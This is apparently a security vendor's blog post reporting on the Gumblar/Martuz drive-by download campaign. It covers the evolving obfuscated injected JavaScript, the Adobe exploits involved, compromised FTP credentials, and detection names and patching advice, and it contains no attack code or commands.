The malicious code Whac-a-Mole game continues. Just as security vendors start detecting the domains and malware associated with the drive-by download attacks coming from the malicious Gumblar domains, the bad guys are changing the game and popping up from Martuz dot cn, which, according to Who.is, is located in the UK with a 95.129.x.x IP Address. The JavaScript appearing on the websites has also become more obfuscated, making the attacks slightly harder for IT managers and Web administrators to detect. The attackers are easily able to change the obfuscation by substituting portions of the domain name with variables instead of spelling out the domain all at once. The updated malicious JavaScript also performs a test to deliver a different payload for users of Google Chrome browsers, since Chrome has a blacklist of suspicious and malicious domains.
The drive-by download tries to exploit a number of underlying vulnerabilities, including some for Adobe Acrobat and Adobe Flash. Users should make sure that their systems are running the latest versions of these and other third-party applications to help mitigate the risk of being compromised.
So how is that so many websites are compromised at one time? Often it is due to SQL injection errors or direct hacking into the back end of the hosting companies, but it appears that this recent problem may be more about compromised FTP passwords that belonged to the people that administer the websites. In any case, it means the bad guys are able to continually change the malicious code until the admin changes the FTP passwords and blocks the trespassing. IT managers and Web administrators should work with their hosting companies to ensure websites are clean.
Symantec antivirus detects some of the malicious code and malware as Bloodhound.Exploit.196, Trojan.Pidief.C, or Bloodhound.PDF.7. We expect the domains and malicious JavaScript appearing on the websites to continually change as one mole is whacked, and another pops up. In the meantime, make sure you have the latest Norton products installed that include IPS and Symantec Browser Protection, Symantec Endpoint Protection with IPS, and the latest third-party application updates (including those for Adobe Acrobat and Adobe Flash).
Note: My thanks to Nishant Doshi for his analysis of this threat.